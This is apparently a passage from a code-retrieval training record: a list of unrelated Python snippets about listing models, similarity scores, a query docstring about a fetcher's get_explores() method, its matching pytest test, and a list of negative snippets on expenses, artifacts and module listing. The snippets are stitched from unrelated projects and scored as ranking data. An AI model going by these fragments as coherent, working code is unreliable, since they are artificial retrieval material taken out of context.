my_downloaded_models[k_model]\n\t\t\t\"\"\"For each model, test if model dir exists, then set up the model once\"\"\"\n\t\t\tself.assertTrue(os.path.isdir(modelname_address))\n\t\t\tself.assertTrue(os.path.exists(\"\".join([modelname_address, \"/lasagne_bestparams.npz\"])))\n\t\t\t\"\"\"TO BE FIXED: THEN SET UP MODEL (memory issues in travis (3 GB RAM there)\"\"\"\n\t\t\t#lmodel = cancerscope.scopemodel(modelname_address_pair[k_model])\n\t\t\t#lmodel.fit()\n\t\t\t#self.assertEqual(len(lmodel.features), 17688)\n\t\t\t#del lmodel; lmodel=None\n\t\t\t#for i in range(3):\n\t\t\t#\tgc.collect()", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def get_related_models(self):\n\t\tmodels = []\n\t\tif not self.related_models:\n\t\t\treturn models\n\n\t\tfor model in self.related_overrides.get(self.related_override_key(), self.related_models):\n\t\t\ttry:\n\t\t\t\tgroup, model_path, extra_fields = model\n\t\t\texcept ValueError:\n\t\t\t\tgroup, model_path = model\n\t\t\t\textra_fields = ()\n\t\t\tapp_label, model_name = model_path.split('.')\n\t\t\tmodels.append((group, apps.get_model(app_label, model_name,), extra_fields, group.replace('_', ' ')))\n\n\t\treturn models", "def supported_models(cls):\n \n models = []\n \n for subclass in cls.__subclasses__():\n models+=subclass.supported_models()\n return models", "def models():\n return list(alg2module.keys())", "def get_available_layers(self, path):\n\n now = datetime.now()\n for model in self.models:\n query = model.objects\n query = query.filter(\n Q(available_start__isnull=True) | Q(available_start__lte=now))\n query = query.filter(\n Q(available_stop__isnull=True) | Q(available_stop__gte=now))\n\n # This bit is a little crazy. We can't use\n # query.filter(field__like=value) because we\n # need to use the value of the field (the regex)\n # as the expression on the query. Instead, we\n # lookup the regex operator for the database connection\n # that the query is using, jigger it a bit, and use\n # it for a manual 'where' clause. This has been tested\n # with postgresql and sqlite. YMMV.\n op = connections[query.db].operators['regex']\n op = op.replace('%s', '').strip()\n query = query.extra(\n where=['%s ' + op + ' path_rx'], params=[path])\n\n for layer in query.order_by('order'):\n yield layer", "def total_models_produced(self):\n return self._total_models_produced", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def get_models(automaker, year):\n\n return set([car['model'] for car in data if car['automaker'] == automaker and car['year'] == year])", "def find_syncable_models(self):\n return [Customer]", "def list_supported_models() -> Sequence[str]:\r\n return list(_MODELS)", "def get_queryset(self):\n if getattr(self, 'use_this_queryset', None):\n return self.use_this_queryset\n return self.model().objects.all()", "def get_global_version_managers(_cls=True):\n queryset = TemplateVersionManager.objects.filter(user=None).all()\n if _cls:\n queryset = queryset.filter(\n _cls=TemplateVersionManager._class_name\n ).all()\n return queryset", "def models(self):\n models = []\n for bundle in self.bundles.values():\n models.extend(list(bundle.models.values()))\n\n return models", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def get_queryset(self):\n return self.model.objects.all()", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def get_queryset(self):\r\n return self.model.objects.all()", "def models(self) -> list[AbstractModel]:\n return self._models", "def get_installed_model_modules(core_models=None):\n global _installed_modules_cache\n if _installed_modules_cache is not None:\n return _installed_modules_cache\n _installed_modules_cache = []\n\n # django.models is a special case.\n for submodule in (core_models or []):\n _installed_modules_cache.append(__import__('django.models.%s' % submodule, '', '', ['']))\n for m in get_installed_models():\n for submodule in getattr(m, '__all__', []):\n mod = __import__('django.models.%s' % submodule, '', '', [''])\n try:\n mod._MODELS\n except AttributeError:\n pass # Skip model modules that don't actually have models in them.\n else:\n _installed_modules_cache.append(mod)\n return _installed_modules_cache", "def get_model_specs(self):\n raise NotImplementedError()", "def findModels(self, Met=None, Y=None, Lmix=None, Mass=None):\n result = []\n for m in self._models:\n if Met is not None:\n if Met != m[0]:\n continue\n if Y is not None:\n if Y != m[1]:\n continue\n if Lmix is not None:\n if Lmix != m[2]:\n continue\n if Mass is not None:\n if Mass != m[3]:\n continue\n result.append(m)\n return result", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def test_list_models():\n model_names = find_model_files()\n listed_model_names = list_available_nagl_models()\n assert listed_model_names == model_names", "def get_related_models(self, model):\n return self._invalidation_model_store.get(model, {})", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def queryset(cls):\n return cls.model._default_manager.all()", "def get_queryset(self):\n if hasattr(self, 'revision_model'):\n return self.revision_model.objects\n raise NotImplementedError()", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()" ]
[ "0.70178705", "0.66382486", "0.6534866", "0.631813", "0.63044095", "0.6285215", "0.61792207", "0.6041896", "0.60361505", "0.6007675", "0.592958", "0.5920479", "0.58479476", "0.5833444", "0.58288264", "0.5817674", "0.58034897", "0.58034897", "0.58034897", "0.58034897", "0.57479924", "0.5734192", "0.5726884", "0.57234335", "0.57156134", "0.5707454", "0.56922764", "0.5678311", "0.5645432", "0.56387645", "0.56209177", "0.56209177", "0.5562725", "0.55562156", "0.555299", "0.55489856", "0.55474484", "0.5507781", "0.54999256", "0.5487013", "0.54782516", "0.5454184", "0.5442128", "0.5439733", "0.5431467", "0.54312044", "0.542052", "0.54084516", "0.5407803", "0.5405204", "0.5393154", "0.53917795", "0.53837395", "0.53772527", "0.5363033", "0.53603226", "0.5354359", "0.5344046", "0.5337248", "0.5333164", "0.5326466", "0.53238297", "0.53189045", "0.53127223", "0.53078544", "0.53074086", "0.5306363", "0.53058285", "0.53045046", "0.5304504", "0.53023344", "0.52706414", "0.5239227", "0.5208246", "0.5206105", "0.5205467", "0.51972127", "0.51908356", "0.5188978", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.51801306", "0.51797336", "0.5155044", "0.5147231", "0.51456827", "0.5145405", "0.5145347", "0.5135066", "0.51331466", "0.5132615" ]
0.7987806
0
fetcher.get_explores() should return a list of explores.
def test_get_explores(fc: fetcher.Fetcher): explores = fc.get_explores() assert isinstance(explores, list) assert len(explores) > 0 assert isinstance(explores[0], models.LookmlModelExplore)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def explores(self, explores):\n\n self._explores = explores", "def get_list(self, resp):\n expenses = resp['expenses']\n expense_list = ExpenseList()\n for value in expenses:\n expense = Expense()\n expense.set_expense_id(value['expense_id'])\n expense.set_date(value['date'])\n expense.set_account_name(value['account_name'])\n expense.set_paid_through_account_name(value[\\\n 'paid_through_account_name'])\n expense.set_description(value['description'])\n expense.set_currency_id(value['currency_id'])\n expense.set_currency_code(value['currency_code'])\n expense.set_bcy_total(value['bcy_total'])\n expense.set_total(value['total'])\n expense.set_is_billable(value['is_billable'])\n expense.set_reference_number(value['reference_number'])\n expense.set_customer_id(value['customer_id'])\n expense.set_customer_name(value['customer_name'])\n expense.set_vendor_id(value['vendor_id'])\n expense.set_vendor_name(value['vendor_name'])\n expense.set_status(value['status'])\n expense.set_created_time(value['created_time'])\n expense.set_expense_receipt_name(value['expense_receipt_name'])\n expense_list.set_expenses(expense)\n page_context_obj = PageContext()\n page_context = resp['page_context']\n page_context_obj.set_page(page_context['page'])\n page_context_obj.set_per_page(page_context['per_page'])\n page_context_obj.set_has_more_page(page_context['has_more_page'])\n page_context_obj.set_report_name(page_context['report_name'])\n page_context_obj.set_applied_filter(page_context['applied_filter'])\n page_context_obj.set_sort_column(page_context['sort_column'])\n page_context_obj.set_sort_order(page_context['sort_order'])\n expense_list.set_page_context(page_context)\n\n return expense_list", "def exploits(self):\n return self.rpc.call(MsfRpcMethod.ModuleExploits)['modules']", "def get_exploits():\n results = {}\n for loader, name, ispkg in pkgutil.walk_packages(acsploit.exploits.__path__):\n m = loader.find_module(name).load_module(name)\n\n if not ispkg and hasattr(m, 'options') and hasattr(m, 'run'):\n exploit = name.replace('.', '/')\n results[exploit] = m\n\n return results", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def _get_exchanges(token: str) -> List[mtypes.Exchange]:\n _LOG.info(\"Getting exchanges from API ...\")\n response = get_client().service.ExchangeList(Token=token)\n\n exchanges = [\n mtypes.Exchange.from_dict(d=obj)\n for obj in zeep.helpers.serialize_object(response.EXCHANGES[\"EXCHANGE\"])\n ]\n _LOG.info(\"Got %s exchanges\", len(exchanges))\n return exchanges", "def get_option_expirations(symbol: str, source: str = \"Nasdaq\") -> list:\n source = re.sub(r\"\\s+\", \"\", source.lower())\n output = []\n if source == \"tradier\":\n output = tradier_model.option_expirations(symbol)\n if source == \"yahoofinance\":\n output = yfinance_model.option_expirations(symbol)\n if source == \"nasdaq\":\n output = nasdaq_model.option_expirations(symbol)\n if source == \"intrinio\":\n output = intrinio_model.get_expiration_dates(symbol)\n\n if not output:\n logger.info(\"Invalid Source or Symbol\")\n console.print(\"Invalid Source or Symbol\")\n return []\n\n return output", "def get(self) -> list:\n return self.__expedition", "def expenses(self):\n\n return Expenses.objects.filter(\n house=self.house,\n )", "def getExpired(self, idle=365):\n cutOff = datetime.datetime.now() - datetime.timedelta(days=idle)\n return [x for x in self.xeps if x.status == \"Experimental\" and x.date < cutOff]", "def expiry_dates(self):\n try:\n return self._expiry_dates\n except AttributeError:\n # has to be a non-valid date, to trigger returning 'expirations'\n d = self._load_data(dt.datetime(2016, 1, 3))\n self._expiry_dates = [dt.date(x['y'], x['m'], x['d'])\n for x in d['expirations']]\n return self._expiry_dates", "def get_all_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_all()]", "def getExpAccessions(cf):\n\tplatform = cf.get_parameter('platform')\n\tsrafetchxml = cf.get_input('srafetchxml')\n\tsraexplist = cf.get_output('sraexplist')\n\tsraxmlparser = SRAXMLParser()\n\truns = sraxmlparser.parse(srafetchxml)\n\twriter = csv.writer(open(sraexplist, 'wb'), quoting=csv.QUOTE_NONE)\n\twriter.writerow(['NCBISRAExpID'])\n\taccessions = []\n\tfor run in runs:\n\t\tif platform and \\\n\t\t\tnot run.platform == platform:\n\t\t\tcontinue\n\t\telif not run.exp_accession in accessions:\n\t\t\twriter.writerow([run.exp_accession])\n\t\t\taccessions.append(run.exp_accession)\n\tcf.write_log(\"GetExpAccessions: wrote %s experiment accessions\" % len(accessions))\n\treturn constants.OK", "def _getExponentialValues(self, arr):\r\n return [math.exp(val) for val in arr]", "def list(self):\n path = \"authSettings/exemptedUrls\"\n return self._session.get(path)", "def get_artifacts(token, artifact_names, start, end):\n\n artifacts = []\n page = 1\n retry_limit = 3\n while True:\n req = Request(URL + f\"&page={page}\")\n req.add_header(\"Accept\", \"application/vnd.github.v3+json\")\n req.add_header(\"Authorization\", f\"token {token}\")\n with urlopen(req) as r:\n # Handle hitting the GitHub rate limit\n # If the reset time is < 90s in the future, wait for it (trying 3 times)\n # Otherwise raise an error\n if r.status == 403:\n try:\n reset = int(r.headers.get(\"X-RateLimit-Reset\"))\n except:\n raise RuntimeError(\"Hit GitHub rate limit. Reset header missing.\")\n if retry_limit == 0 or time.time() > reset or reset - time.time() > 90:\n raise RuntimeError(\"Hit GitHub rate limit. Reset is at %s\" % time.ctime(reset))\n\n # Try waiting until after the reset time\n time.sleep(10 + (reset - time.time()))\n retry_limit = retry_limit - 1\n continue\n\n if r.status != 200:\n raise RuntimeError(\"Error (%d) with API request: %s\" % (r.status, str(r)))\n\n data = json.load(r)\n\n # Only include the artifacts within the date range and names\n for a in data[\"artifacts\"]:\n if a[\"name\"] not in artifact_names:\n continue\n updated_at = datetime.fromisoformat(a[\"updated_at\"][:-1])\n if start <= updated_at <= end:\n artifacts.append(a)\n\n if len(data[\"artifacts\"]) < 100:\n break\n\n # There are more results, get the next page\n page = page + 1\n\n # Avoid hitting per-second rate limits\n time.sleep(2)\n\n return sorted(artifacts, key=lambda x: x[\"updated_at\"])", "def experiences(self):\n return self.client.call('GET',\n self.name + 'experiences')", "def get_option_expirations(\n self, symbol: str, include_all_roots: bool = None, strikes: str = None\n ) -> List[date]:\n url = \"/v1/markets/options/expirations\"\n params = {\n \"symbol\": symbol,\n \"includeAllRoots\": include_all_roots,\n \"strikes\": strikes,\n }\n\n data = self.get(url, params)\n res = MarketsAPIResponse(**data)\n return res.expirations.date", "def return_expenses():\r\n g.db.execute(\"SELECT * FROM monthly_data ORDER BY Sr\")\r\n rows = g.db.fetchall()\r\n data = []\r\n for x in rows:\r\n data.append({'sr':x[0],'name':x[1], 'id':x[2], 'item':x[3], 'price':x[5], 'date':x[4]})\r\n return jsonify(data)", "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def test_api_can_get_all_expenses(self):\n self.register_user()\n result = self.login_user()\n access_token = json.loads(result.data.decode())['access_token']\n res = self.client().post('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token), data=self.expense)\n self.assertEqual(res.status_code, 201)\n res = self.client().get('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token))\n self.assertEqual(res.status_code, 200)\n results = json.loads(res.data)\n self.assertEqual(results['items'][0]['name'], self.expense['name'])", "def list(self, request):\n currentYear = datetime.now().year\n expenses = Expenses.objects.filter(\n date_purchased__contains=currentYear)\n serializer = ExpenseSerializer(\n expenses, many=True, context={'request': request})\n return Response(serializer.data)", "def get_scans_list(server_url, exp_no, return_list=False):\n if server_url.endswith('/') is False:\n server_url = '%s/' % server_url\n data_dir_url = '%sexp%d/Datafiles' % (server_url, exp_no)\n\n does_exist, raw_lines = check_url(data_dir_url, read_lines=True)\n if does_exist is False:\n return \"Experiment %d's URL %s cannot be found.\" % (exp_no, data_dir_url)\n\n # Scan through the index page\n scan_list = []\n header = 'HB3A_exp%04d_scan' % exp_no\n for line in raw_lines:\n if line.count(header) > 0:\n # try to find file HB3A_exp0123_scan6789.dat\n term = line.split(header)[1].split('.dat')[0]\n scan = int(term)\n # check\n if '%04d' % scan == term:\n scan_list.append(scan)\n # END_FOR\n scan_list = sorted(scan_list)\n if return_list is True:\n return scan_list\n\n message = 'Experiment %d: Scan from %d to %d' % (exp_no, scan_list[0], scan_list[-1])\n\n return message", "def get_exchanges():\n url = 'https://help.yahoo.com/kb/finance-for-web/SLN2310.html?impressions=true'\n dataframes = pd.read_html(url)\n return dataframes[0]", "def ListArtifacts(context=None):\n args = artifact_pb2.ApiListArtifactsArgs()\n\n items = context.SendIteratorRequest(\"ListArtifacts\", args)\n return utils.MapItemsIterator(\n lambda data: Artifact(data=data, context=context), items)", "def _CheckExpirations(file_objs):\n expired = []\n unexpired = []\n for file_obj in file_objs:\n if _IsExpired(file_obj):\n expired.append(file_obj)\n else:\n unexpired.append(file_obj)\n return expired, unexpired", "def listExpirationsIntent_handler(handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In listExpirations\")\n attributesManager = handler_input.attributes_manager\n try:\n saved_attr = attributesManager.persistent_attributes\n except AttributesManagerException:\n logger.info(\"Persistent Adapter is not defined\")\n logger.info(\"After getting persistent attributes\")\n if saved_attr == {}:\n speech = \"La lista e' vuota.\"\n else:\n speech=\"\"\n for k in saved_attr.keys():\n speech += saved_attr[k]['object']+\" scadra' il giorno \"+saved_attr[k]['expiration']+\". \"\n \n handler_input.response_builder.set_should_end_session(True)\n handler_input.response_builder.speak(speech)\n return handler_input.response_builder.response", "def test_obtain_issues(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='High')]\n\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n\n self.assertIsInstance(issues, List)\n self.assertIsInstance(issues[0], Checkmarx.Issue)\n self.assertEqual('JScript Vulnerabilities', issues[0].group)\n self.assertEqual('Reflected XSS', issues[0].title)\n self.assertEqual('http://url/CxWebClient/ScanQueryDescription.aspx?queryID=789&'\n 'queryVersionCode=842956&queryTitle=Reflected_XSS', issues[0].display_url)\n self.assertEqual(1, issues[0].count)\n self.assertEqual(\"Recurrent\", issues[0].status)", "def living_expenses(self):\n # Prepare arguments for call to `living_expenses_strategy`\n # NOTE: This is a pretty brittle way to determine the\n # retirement year. Issues #15 and #28 will require this\n # code to be changed in a future version.\n retirement_year = min(\n person.retirement_date.year for person in self.people)\n return self.living_expenses_strategy(\n year=self.this_year,\n people=self.people,\n retirement_year=retirement_year)", "def get_all_images(access_token):\n url = 'http://interview.agileengine.com/images'\n headers = {\n 'Authorization': 'Bearer ' + access_token\n }\n images = []\n try:\n logging.info(\"Fetching all the images\")\n response = requests.get(\n url,\n headers=headers\n )\n if response.ok: \n total_pages = response.json().get('pageCount')\n images = response.json().get('pictures')\n logging.info(f\"fetched 1 of {total_pages}\")\n for i in range(2,total_pages + 1):\n paginated_url = f'http://interview.agileengine.com/images?page={i}'\n response = requests.get(\n paginated_url,\n headers=headers\n )\n images += response.json().get('pictures')\n logging.info(f\"fetched {i} of {total_pages}\")\n \n detailed_images = []\n for image in images:\n detail_url = f\"http://interview.agileengine.com/images/{image.get('id')}\"\n \n logging.info(f\"Retrieving detail of {image['id']}\")\n response = requests.get(\n detail_url,\n headers=headers\n )\n if response.ok:\n detailed_images.append(response.json())\n return detailed_images\n except requests.exceptions.HTTPError:\n logging.exception('HTTP error')\n except requests.exceptions.ConnectionError:\n logging.exception('Connection error')\n except requests.exceptions.Timeout:\n logging.exception('Timeout error')\n except requests.exceptions.RequestException as e:\n logging.exception('Unexpected error')", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def set_list_of_expenses(self):\n fix_exp = DB.get_fixed_expenses(self.customer.email)\n var_exp = DB.get_variable_expenses(self.customer.email)\n self.listOfExpensesSEK.item(2).setText(str(fix_exp[\"subscription\"]))\n self.listOfExpensesSEK.item(3).setText(str(fix_exp[\"insurance\"]))\n self.listOfExpensesSEK.item(4).setText(str(fix_exp[\"rent\"]))\n self.listOfExpensesSEK.item(5).setText(str(fix_exp[\"others\"]))\n\n self.listOfExpensesSEK.item(11).setText(str(var_exp[\"food\"]))\n self.listOfExpensesSEK.item(12).setText(str(var_exp[\"bills\"]))\n self.listOfExpensesSEK.item(13).setText(str(var_exp[\"transportation\"]))\n self.listOfExpensesSEK.item(14).setText(str(var_exp[\"hygien\"]))\n self.listOfExpensesSEK.item(15).setText(str(var_exp[\"clothes\"]))\n self.listOfExpensesSEK.item(16).setText(str(var_exp[\"entertainment\"]))\n self.listOfExpensesSEK.item(17).setText(str(var_exp[\"others\"]))", "def set_list_of_expenses(self):\n fix_exp = DB.get_fixed_expenses(self.customer.email)\n var_exp = DB.get_variable_expenses(self.customer.email)\n self.listOfExpensesSEK.item(2).setText(str(fix_exp[\"subscription\"]))\n self.listOfExpensesSEK.item(3).setText(str(fix_exp[\"insurance\"]))\n self.listOfExpensesSEK.item(4).setText(str(fix_exp[\"rent\"]))\n self.listOfExpensesSEK.item(5).setText(str(fix_exp[\"others\"]))\n\n self.listOfExpensesSEK.item(11).setText(str(var_exp[\"food\"]))\n self.listOfExpensesSEK.item(12).setText(str(var_exp[\"bills\"]))\n self.listOfExpensesSEK.item(13).setText(str(var_exp[\"transportation\"]))\n self.listOfExpensesSEK.item(14).setText(str(var_exp[\"hygien\"]))\n self.listOfExpensesSEK.item(15).setText(str(var_exp[\"clothes\"]))\n self.listOfExpensesSEK.item(16).setText(str(var_exp[\"entertainment\"]))\n self.listOfExpensesSEK.item(17).setText(str(var_exp[\"others\"]))", "def test_get_explores_throws_if_model_or_explore_does_not_exist(\n fc: fetcher.Fetcher, model: Optional[str], explore: Optional[str], msg: str\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_explores(model=model, explore=explore)\n assert msg in str(exc.value)", "def list(self, request):\n exp = Experiment.objects.all()\n serializer = ExperimentSerializer(exp, many=True)\n return send_response(request.method, serializer)", "def list_of_exchanges(test_mode: bool = False) -> list:\n try:\n return ListOfExchanges(test_mode=test_mode)\n except Exception as exception:\n logger.error('Oops! An error Occurred ⚠️')\n raise exception", "def get_all(self):\n total_expense_reports = []\n get_count = {\n 'query': {\n 'object': 'EEXPENSES',\n 'select': {\n 'field': 'RECORDNO'\n },\n 'pagesize': '1'\n }\n }\n\n response = self.format_and_send_request(get_count)\n count = int(response['data']['@totalcount'])\n pagesize = 2000\n offset = 0\n for i in range(0, count, pagesize):\n data = {\n 'query': {\n 'object': 'EEXPENSES',\n 'select': {\n 'field': [\n 'RECORDNO',\n 'RECORDID',\n 'WHENCREATED',\n 'WHENPOSTED',\n 'TOTALENTERED',\n 'STATE',\n 'TOTALDUE',\n 'DESCRIPTION',\n 'CURRENCY',\n 'BASECURR',\n 'MEMO'\n ]\n },\n 'pagesize': pagesize,\n 'offset': offset\n }\n }\n expense_reports = self.format_and_send_request(data)['data']['EEXPENSES']\n total_expense_reports = total_expense_reports + expense_reports\n offset = offset + pagesize\n return total_expense_reports", "def get_sites():\n results = __gae_fetch('https://api.stackexchange.com/%s/sites?pagesize=999&key=%s' % (__api_version, api_key))\n response = simplejson.loads(results.content)\n return response", "def _extract_articles(self, target):\n feed_response, modified, etag = self._get_recent_feed(target)\n\n # Bozo is a tag which tells that the RSS hasn't been parsed correctly.\n if feed_response.bozo:\n exc = feed_response.bozo_exception\n if not isinstance(exc, self.ALLOWED_EXCEPTIONS):\n raise exc\n\n articles = []\n count = 0\n if self._manage_status(feed_response, target):\n for feed_entry in feed_response.entries:\n if self._limit and count >= self._limit:\n logging.info(\n \"Crawling limit of %d article(s) was reached for this target.\",\n count\n )\n break\n try:\n article = self.extract_article(feed_entry, target)\n except Exception as exc:\n # NOTE(cmiN): On Stackdriver Error Reporting we don't want to catch\n # (with `logging.exception`) \"Not Found\" errors, because they are\n # pretty frequent and usual, therefore ignore-able.\n log_function = (\n logging.error if \"404\" in str(exc) else logging.exception\n )\n log_function(\"Got %s while parsing %r.\", exc, feed_entry.id)\n else:\n articles.append(article)\n count += 1\n target.checkpoint(modified, etag)\n\n return articles", "def impressions(self):\r\n return resource.Impressions(self)", "async def delete_expired_responses(self):\n logger.info(f'Deleting all responses more than {self.expire_after} hours old')\n keys_to_delete = set()\n\n for key in await self.responses.keys():\n response = await self.get_response(key)\n if response and response.is_expired:\n keys_to_delete.add(key)\n\n logger.info(f'Deleting {len(keys_to_delete)} expired cache entries')\n for key in keys_to_delete:\n await self.delete(key)", "def ListSpires(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def list_extractors(age_limit=None):\n return [ie() for ie in list_extractor_classes(age_limit)]", "def retrieve_closed_issues(self):\n return self._retrieve_issues(\"closed\")", "def get_price_list(self):\n # Fetch the resource info then get a copy of it\n self._res_man.collect_resource_info()\n res_list = self._res_man.get_resource_info()\n # Pack the price response!\n price_response = PriceResponse()\n for res in res_list:\n price = res.post_price()\n res_type = res.get_res_type()\n if res_type == ResourceType.LINK:\n src_zone_id, dst_zone_id = res.get_src_and_dst()\n price_response.add_link_price(\n src_zone_id,\n dst_zone_id,\n price,\n res.get_max_valuation()\n )\n else:\n price_response.add_resource_price(\n res.get_zone_id(),\n res_type,\n price,\n res.get_max_valuation()\n )\n # Save prices for later, if needed\n if self._use_price_token:\n # Generate token\n self._num_req += 1\n token = hash(str(self._num_req))\n price_response.set_price_token(token)\n # Get mapping\n price_mapping = self._res_man.get_res_to_price_mapping()\n # Get priority\n pri = time() + self._token_duration\n with self._history_lock:\n self._hist_q.put((pri, token))\n self._price_history[token] = price_mapping\n logger.debug(\n f'Saved prices with token {token} '\n f'for {self._token_duration} seconds'\n )\n return 